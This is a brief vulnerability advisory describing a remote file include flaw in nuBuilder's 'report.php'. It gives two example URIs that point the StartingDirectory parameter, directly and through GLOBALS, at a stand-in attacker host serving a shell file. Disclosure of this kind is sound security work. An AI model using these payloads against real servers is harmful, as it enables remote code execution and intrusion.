nuBuilder 'report.php' Remote File Include Vulnerability

nuBuilder 'report.php' Remote File Include Vulnerability

Attackers can exploit this issue through a browser.

The following example URIs are available:

http://www.example.com/report.php?StartingDirectory=http://attacker.tld/shell.txt?
http://www.example.com/report.php?GLOBALS[StartingDirectory]=http://attacker.tld/shell.txt?